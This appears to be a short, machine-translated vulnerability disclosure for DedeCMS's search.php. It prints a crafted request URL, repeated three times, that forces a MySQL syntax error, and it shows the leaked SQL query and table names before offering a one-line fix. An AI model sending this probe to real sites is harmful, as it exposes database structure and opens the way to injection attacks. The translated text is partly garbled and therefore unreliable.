Qingtian Xiaozhu PS :... When a white dress comes, it seems to be clear and cool. In fact, it is cool, non-human...
Detailed description:
Http://www.dedecms.com/plus/search.php? Keyword = xxxx & channeltype =-0 & orderby = & kwtype =-1 & pagesize = 10 & typeid = 0 & TotalResult =-336 & PageNo = % 3E % 3E % 3E % 3E % 3E % 3E % 3E % 3E % 3E % 3E % 3 EFuck % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C & plistgo = % C7 % E7 % CC % EC % D0 % A1 % D6 % FD?
Proof of vulnerability:
Http://www.dedecms.com/plus/search.php? Keyword = xxxx & channeltype =-0 & orderby = & kwtype =-1 & pagesize = 10 & typeid = 0 & TotalResult =-336 & PageNo = % 3E % 3E % 3E % 3E % 3E % 3E % 3E % 3E % 3E % 3E % 3 EFuck % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C & plistgo = % C7 % E7 % CC % EC % D0 % A1 % D6 % FD?
Error page:/plus/search. php? Keyword = xxxx & channeltype =-0 & orderby = & kwtype =-1 & pagesize = 10 & typeid = 0 & TotalResult =-336 & PageNo = % 3E % 3E % 3E % 3E % 3E % 3E % 3E % 3E % 3E % 3E % 3 EFuck % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C % 3C & plistgo = % C7 % E7 % CC % EC % D0 % A1 % D6 % FD?
Error infos: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-10, 10' at line 4
Error SQL: Select arc. *, act. typedir, act. typename, act. isdefault, act. defaultname, act. namerule, act. namerule2, act. ispart, act. moresite, act. siteurl, act. sitepath from 'dede _ archives 'arc left join 'dede _ arctype 'Act on arc. typeid = act. id where arc. arcrank>-1 And (CONCAT (arc. title, '', arc. writer, '', arc. keywords) like '% xxxx %') order by arc. sortrank desc limit-10, 10
Solution:
Php error not echo